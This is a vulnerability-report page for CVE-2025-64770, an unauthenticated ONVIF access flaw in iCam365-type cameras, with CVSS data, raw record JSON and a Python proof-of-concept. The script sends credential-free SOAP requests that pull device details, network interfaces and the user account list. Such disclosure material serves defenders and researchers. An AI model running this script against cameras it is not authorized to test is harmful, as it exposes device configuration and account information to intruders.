Security Vulnerability Report
CVE-2025-64770 CVSS 6.8 MEDIUM

CVE-2025-64770

Published: 2025-11-20 21:16:07
Last Modified: 2026-04-15 00:35:42

Description

The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information.

CVSS Details (v3.1; the raw record below also carries a CVSS v4.0 base score of 7.0 HIGH)

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

iCam365 and related ONVIF-compatible camera products (firmware versions not explicitly disclosed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
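import requests
import xml.etree.ElementTree as ET

# CVE-2025-64770 PoC - ONVIF Unauthenticated Access
# Target: Affected camera products with ONVIF service
#
# The CVE record classifies the weakness as CWE-306 (missing authentication
# for a critical function). Every request built here carries no SOAP header
# and no HTTP credentials, so a populated answer means the device served the
# operation to a caller that never authenticated.

ONVIF_NS = {
    'onvif': 'http://www.onvif.org/ver10/device/wsdl',
    'tt': 'http://www.onvif.org/ver10/schema'
}

# Content type shared by every SOAP 1.2 request this script sends.
_SOAP_CONTENT_TYPE = 'application/soap+xml; charset=utf-8'

# Element-name suffix in the GetDeviceInformation response -> key in the
# dict returned by parse_device_info.
_DEVICE_INFO_FIELDS = (
    ('Manufacturer', 'manufacturer'),
    ('Model', 'model'),
    ('FirmwareVersion', 'firmware'),
    ('SerialNumber', 'serial'),
)


def build_onvif_request(action):
    """Build ONVIF SOAP request without authentication.

    Args:
        action: Operation name; one of 'GetDeviceInformation',
            'GetNetworkInterfaces', 'GetUsers' or 'GetProfiles'.

    Returns:
        The SOAP envelope for that operation as a string, or '' when the
        action is not one of the known templates.
    """
    templates = {
        'GetDeviceInformation': '''<?xml version="1.0" encoding="UTF-8"?>
<soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope">
    <soap-env:Body>
        <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
    </soap-env:Body>
</soap-env:Envelope>''',
        'GetNetworkInterfaces': '''<?xml version="1.0" encoding="UTF-8"?>
<soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope">
    <soap-env:Body>
        <GetNetworkInterfaces xmlns="http://www.onvif.org/ver10/device/wsdl"/>
    </soap-env:Body>
</soap-env:Envelope>''',
        'GetUsers': '''<?xml version="1.0" encoding="UTF-8"?>
<soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope">
    <soap-env:Body>
        <GetUsers xmlns="http://www.onvif.org/ver10/device/wsdl"/>
    </soap-env:Body>
</soap-env:Envelope>''',
        'GetProfiles': '''<?xml version="1.0" encoding="UTF-8"?>
<soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope">
    <soap-env:Body>
        <GetProfiles xmlns="http://www.onvif.org/ver10/media/wsdl"/>
    </soap-env:Body>
</soap-env:Envelope>'''
    }
    return templates.get(action, '')


def exploit_cve_2025_64770(target_ip, port=554):
    """
    Check a camera for CVE-2025-64770: unauthenticated ONVIF access.

    Sends GetDeviceInformation with no credentials to each candidate
    endpoint. The first endpoint that answers HTTP 200 *and* returns at
    least one parsable device field is recorded as the working endpoint,
    and the network-interface and user queries are then sent to it.

    Args:
        target_ip: Target camera IP address
        port: ONVIF service port (default 554)

    Returns:
        dict: empty when no endpoint answered with device information;
        otherwise the keys 'endpoint', 'device_info', 'vulnerable',
        'network_interfaces' and 'users'.

    NOTE(review): 554 is the registered RTSP port, whereas the endpoints
    built here are HTTP SOAP paths. The page does not say which port the
    affected products serve ONVIF on, so a negative result on the default
    is inconclusive; confirm the port against the vendor advisory.
    """
    endpoints = [
        f"http://{target_ip}:{port}/onvif/device_service",
        f"http://{target_ip}:{port}/onvif/service"
    ]

    results = {}

    headers = {
        'Content-Type': _SOAP_CONTENT_TYPE,
        'SOAPAction': 'http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation'
    }
    # The request body is the same for every endpoint; build it once.
    body = build_onvif_request('GetDeviceInformation')

    for endpoint in endpoints:
        try:
            response = requests.post(
                endpoint,
                data=body,
                headers=headers,
                timeout=10
            )
        except requests.RequestException:
            # Unreachable or refused: try the next candidate path.
            continue

        if response.status_code != 200:
            continue

        device_info = parse_device_info(response.text)
        # A bare HTTP 200 is not evidence of the flaw: any web server, or a
        # device answering with a SOAP fault, can return 200. Only report
        # the finding when device fields actually came back.
        if not device_info or 'error' in device_info:
            continue

        results['endpoint'] = endpoint
        results['device_info'] = device_info
        results['vulnerable'] = True

        # Additional enumeration
        results['network_interfaces'] = get_network_info(endpoint)
        results['users'] = get_user_list(endpoint)
        break

    return results


def parse_device_info(xml_response):
    """Parse ONVIF GetDeviceInformation response.

    Args:
        xml_response: Response body as text.

    Returns:
        dict with any of 'manufacturer', 'model', 'firmware' and 'serial'
        that were present, or {'error': 'Failed to parse response'} when
        the body is not well-formed XML.
    """
    # NOTE(review): the body comes from the device under test and is
    # untrusted. The Python documentation lists xml.etree.ElementTree as
    # not hardened against maliciously constructed XML (entity expansion);
    # a hardened parser or a cap on response size is advisable.
    try:
        root = ET.fromstring(xml_response)
    except (ET.ParseError, ValueError):
        return {'error': 'Failed to parse response'}

    info = {}
    for elem in root.iter():
        # Tags are namespace-qualified ('{uri}Name'), hence suffix matching.
        for suffix, key in _DEVICE_INFO_FIELDS:
            if elem.tag.endswith(suffix):
                info[key] = elem.text
                break
    return info


def _post_unauthenticated(endpoint, action):
    """POST the SOAP template for *action*; return the body text or a status string."""
    headers = {
        'Content-Type': _SOAP_CONTENT_TYPE
    }
    try:
        resp = requests.post(endpoint, data=build_onvif_request(action),
                             headers=headers, timeout=10)
    except requests.RequestException:
        # Only transport-level failures are expected here; anything else is
        # a programming error and should surface instead of being hidden.
        return 'Request failed'
    return resp.text if resp.status_code == 200 else 'Failed'


def get_network_info(endpoint):
    """Enumerate network interfaces via ONVIF.

    Returns the raw response text on HTTP 200, 'Failed' on any other
    status, and 'Request failed' when the request itself errors.
    """
    return _post_unauthenticated(endpoint, 'GetNetworkInterfaces')


def get_user_list(endpoint):
    """Enumerate users via ONVIF.

    A device that answers GetUsers without credentials is disclosing its
    account list to unauthenticated callers. Returns the raw response text
    on HTTP 200, 'Failed' on any other status, and 'Request failed' when
    the request itself errors.
    """
    return _post_unauthenticated(endpoint, 'GetUsers')


if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print('Usage: python cve_2025_64770.py <target_ip> [port]')
        sys.exit(1)

    target = sys.argv[1]
    try:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    except ValueError:
        # A non-numeric port used to end in a traceback; show the usage line.
        print('Usage: python cve_2025_64770.py <target_ip> [port]')
        sys.exit(1)

    print(f'[*] Scanning {target} for CVE-2025-64770...')
    results = exploit_cve_2025_64770(target, port)

    if results.get('vulnerable'):
        print('[+] Target is VULNERABLE to CVE-2025-64770')
        print(f'[+] Working endpoint: {results["endpoint"]}')
        print(f'[+] Device Info: {results.get("device_info", {})}')
    else:
        # Inconclusive rather than a clean bill of health: the service may
        # be listening on a different port or path than the ones tried.
        print('[-] Target may not be vulnerable or ONVIF service not found')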

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64770", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:06.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], 
"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json", "source": "[email protected]"}, {"url": "https://icam365.net/en/aboutUs/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02", "source": "[email protected]"}]}}